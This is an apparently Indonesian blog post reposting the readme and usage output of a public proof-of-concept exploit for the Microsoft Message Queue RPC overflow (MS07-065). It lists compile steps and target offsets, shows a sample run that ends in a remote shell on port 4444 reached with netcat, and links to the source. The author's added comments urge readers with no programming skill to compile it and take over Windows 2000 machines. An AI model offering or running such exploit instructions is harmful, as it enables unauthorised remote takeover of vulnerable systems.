Oleh Dendi Suhubdy A.K.A Cron of NuLL
******** Microsoft Message Queue POC exploit ( MS07-065 )**********
Mario Ballano - (mballano~gmail.com) - http://www.48bits.com
Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org
*********************************************************************
* Original Advisory:
http://www.zerodayinitiative.com/advisories/ZDI-07-076.html
* Microsoft Bulletin :
http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx
* CVE Code: CVE-2007-3039
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039
* Timeline:
No naked news this time, just rum and whiskey
* Additional information:
From Microsoft support http://support.microsoft.com/?id=178517 : RPC dynamic RPC ports for MQ 2101,2103,2105
HSC of course http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html
Dave´s unmidl http://www.immunitysec.com/resources-freesoftware.shtml
* How to compile: Call your favorite SetEnv.Cmd from microsoft SDK and then exec nmake.
* Note: There are several rpc ports to trigger the overflow. If you hit a system then
looks like you´ll need to send the exploit twice or specify another port (-p ) to exploit it again.
There is a chance that offsets are invalid for windows 2000 server (only spanish win2k advanced server was tested)
Adjust them if needed.
Usage:
C:\Programación\MessageQueue>MessageQueue.exe
--------------------------------------------------------------
Microsoft MessageQueue local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 Advanced server SP4
--------------------------------------------------------------
Usage (cara penggunaan exploit)
MessageQueue.exe -h hostname [-d Dnssuffix] [-n netbiosname] [-p port] [-t lang]
Targets:
0 (0x6bad469b) - Windows 2000 Advanced server English (default - untested)
1 (0x6b9d469b) - Windows 2000 Advanced server Spanish
2 (0x41414141) - Windows 2000 Advanced server crash
C:\Programación\\MessageQueue>MessageQueue.exe -h 192.168.1.39
--------------------------------------------------------------
Microsoft MessageQueue local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 Advanced server SP4
--------------------------------------------------------------
//contoh screen display pada saat exploit diluncurkan......
[+] Binding to ncacn_ip_tcp:192.168.1.39
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[LRPC00000414.00000001]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QMsvc$testserver]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QmReplService]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QMMgmtFacility$testserver]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.39[1222]
[+] Using gathered netbios name: testserver
[+] Dynamic MessageQueue rpc port found (1222)
[+] Connecting to fdb3a030-065f-11d1-bb9b-00a024ea5525@ncacn_ip_tcp:192.168.1.39[1222]
[+] RpcBindingFromStringBinding success
[+] Trying to fingerprint target...
[+] Fqdn name obtained from netbios packet: testserver.local
[+] Remote OS Fingerprint (05.00)
[+] Remote Host identified as Windows 2000
[+] Sending POC Exploit code to QMCreateObjectInternal()
[+] Try to connect to remote host at port 4444 for a shell
C:\>nc 192.168.1.39 4444
Microsoft Windows 2000 [Versión 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32> ///BRAVOOOOOOOOO, THE VIESTA BEGINS HERE....segala kemungkinan serangan selalu terbuka!!!!!!!!!!!
Special thanks to Anres Tarasco and Mario Ballano.........
Source code here ok........
http://www.milw0rm.com/sploits/2007-MessageQueue.zip
Kalau Anda memiliki kemampuan programming, ada baiknya Anda mencoba menganalisa source codenya, tapi kalau tidak dan Anda ingin sekali mencoba mengusai kompie Win2k, Anda tinggal mengcompilenya dengan masuk command line trus ke directory active source code, ketikkan “nmake” diikuti dengan pencetan enter (he…he..=)))...…jangan lupa Anda harus menginstall Visual C++ untuk mengcompile codenya....
Cheers and happy exploiting.........
0 comments:
Post a Comment